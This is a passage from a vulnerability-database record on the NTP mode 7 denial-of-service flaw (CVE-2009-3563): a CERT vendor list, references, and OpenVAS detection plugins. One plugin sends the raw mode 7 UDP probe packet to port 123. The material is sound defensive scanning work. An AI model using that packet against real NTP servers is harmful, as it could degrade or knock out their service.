vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Enterasys Networks Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Foundry Networks, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IP Infusion, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Infoblox Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intoto Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mandriva S. A. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### McAfee Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetApp Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Process Software Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Q1 Labs Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### RadWare, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SmoothWall Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Soapstone Networks Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sourcefire Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### U4EA Technologies, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vyatta Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 92 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <https://support.ntp.org/bugs/show_bug.cgi?id=1331>\n * <http://tools.ietf.org/html/rfc2827>\n * <http://tools.ietf.org/html/rfc3704>\n * <http://www.ntp.org/downloads.html>\n * <http://www.ubuntu.com/usn/USN-867-1>\n * <http://security-tracker.debian.org/tracker/CVE-2009-3563>\n * <http://tools.cisco.com/security/center/viewAlert.x?alertId=19540>\n\n### Acknowledgements\n\nThanks to Harlan Stenn for reporting this vulnerability.\n\nThis document was written by Will Dormann, based on information provided by Harlan Stenn.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-3563](<http://web.nvd.nist.gov/vuln/detail/CVE-2009-3563>) \n---|--- \n**Date Public:** | 2009-12-08 \n**Date First Published:** | 2009-12-08 \n**Date Last Updated: ** | 2011-07-22 12:47 UTC \n**Document Revision: ** | 32 \n", "modified": "2011-07-22T12:47:00", "published": "2009-12-08T00:00:00", "id": "VU:568372", "href": "https://www.kb.cert.org/vuls/id/568372", "type": "cert", "title": "NTP mode 7 denial-of-service vulnerability", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "openvas": [{"lastseen": "2017-09-18T11:20:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "NTP is prone to a remote denial-of-service vulnerability because it\nfails to properly handle certain incoming network packets.\n\nAn attacker can exploit this issue to cause the application to consume\nexcessive CPU resources and fill disk space with log messages.", "modified": "2017-09-15T00:00:00", "published": "2009-12-15T00:00:00", "id": "OPENVAS:100399", "href": "http://plugins.openvas.org/nasl.php?oid=100399", "type": "openvas", "title": "NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ntp_37255.nasl 7144 2017-09-15 12:14:43Z cfischer $\n#\n# NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"NTP is prone to a remote denial-of-service vulnerability because it\nfails to properly handle certain incoming network packets.\n\nAn attacker can exploit this issue to cause the application to consume\nexcessive CPU resources and fill disk space with log messages.\";\n\ntag_solution = \"Updates are available. Please see the references for details.\";\n\nif (description)\n{\n script_id(100399);\n script_version(\"$Revision: 7144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-15 14:14:43 +0200 (Fri, 15 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-15 19:11:56 +0100 (Tue, 15 Dec 2009)\");\n script_bugtraq_id(37255);\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_name(\"NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/37255\");\n script_xref(name : \"URL\" , value : \"https://support.ntp.org/bugs/show_bug.cgi?id=1331\");\n script_xref(name : \"URL\" , value : \"http://www.ntp.org/\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/568372\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Denial of Service\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"ntp_open.nasl\");\n script_mandatory_keys(\"NTP/Running\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\nport = \"123\";\nif(!(get_udp_port_state(port)))exit(0);\n\ndata = raw_string(0x97, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00);\nsoc = open_sock_udp(port);\nif(!soc)exit(0);\n\nsend(socket:soc, data:data);\nr = recv(socket:soc, length:8);\nclose(soc);\n\nif(!r)exit(0);\n\nif(hexstr(r) == \"9700000030000000\") {\n\n security_message(port:port, proto:\"udp\");\n exit(0);\n\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-20T13:18:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-10:02.ntpd.asc", "modified": "2017-12-19T00:00:00", "published": "2010-01-11T00:00:00", "id": "OPENVAS:136141256231066662", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066662", "type": "openvas", "title": "FreeBSD Security Advisory (FreeBSD-SA-10:02.ntpd.asc)", "sourceData": "#\n#ADV FreeBSD-SA-10:02.ntpd.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from ADV FreeBSD-SA-10:02.ntpd.asc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_insight = \"The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP)\nused to synchronize the time of a computer system to a reference time\nsource.\n\nIf ntpd receives a mode 7 (MODE_PRIVATE) request or error response\nfrom a source address not listed in either a 'restrict ... noquery'\nor a 'restrict ... ignore' section it will log the even and send\na mode 7 error response.\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-10:02.ntpd.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-10:02.ntpd.asc\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66662\");\n script_version(\"$Revision: 8168 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 08:30:15 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-11 23:48:26 +0100 (Mon, 11 Jan 2010)\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"FreeBSD Security Advisory (FreeBSD-SA-10:02.ntpd.asc)\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"8.0\", patchlevel:\"2\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"7.2\", patchlevel:\"6\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"7.1\", patchlevel:\"10\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"6.4\", patchlevel:\"9\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"6.3\", patchlevel:\"15\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201001-01.", "modified": "2017-07-07T00:00:00", "published": "2010-01-07T00:00:00", "id": "OPENVAS:66639", "href": "http://plugins.openvas.org/nasl.php?oid=66639", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201001-01 (ntp)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A Denial of Service condition in ntpd can cause excessive CPU or bandwidth\nconsumption.\";\ntag_solution = \"All NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/ntp-4.2.4_p7-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201001-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=290881\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201001-01.\";\n\n \n \n\nif(description)\n{\n script_id(66639);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-07 13:59:33 +0100 (Thu, 07 Jan 2010)\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 201001-01 (ntp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/ntp\", unaffected: make_list(\"ge 4.2.4_p7-r1\"), vulnerable: make_list(\"lt 4.2.4_p7-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing an update to ntp\nannounced via advisory FEDORA-2009-13046.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066501", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066501", "type": "openvas", "title": "Fedora Core 12 FEDORA-2009-13046 (ntp)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13046.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13046 (ntp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy 